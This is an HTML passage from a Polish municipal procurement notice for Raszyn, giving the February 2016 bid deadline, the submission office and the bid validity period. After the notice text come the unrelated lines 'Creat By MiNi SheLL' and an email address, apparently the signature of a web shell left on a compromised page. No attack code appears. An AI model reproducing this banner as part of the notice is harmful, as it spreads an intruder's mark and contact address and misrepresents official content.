<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2016 godzina 10:30, miejsce: w siedzibie Zamawiającego, Raszyn przy ul. Szkolnej 2a, Parter- Biuro Obsługi Mieszkańców, pok. nr 15..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com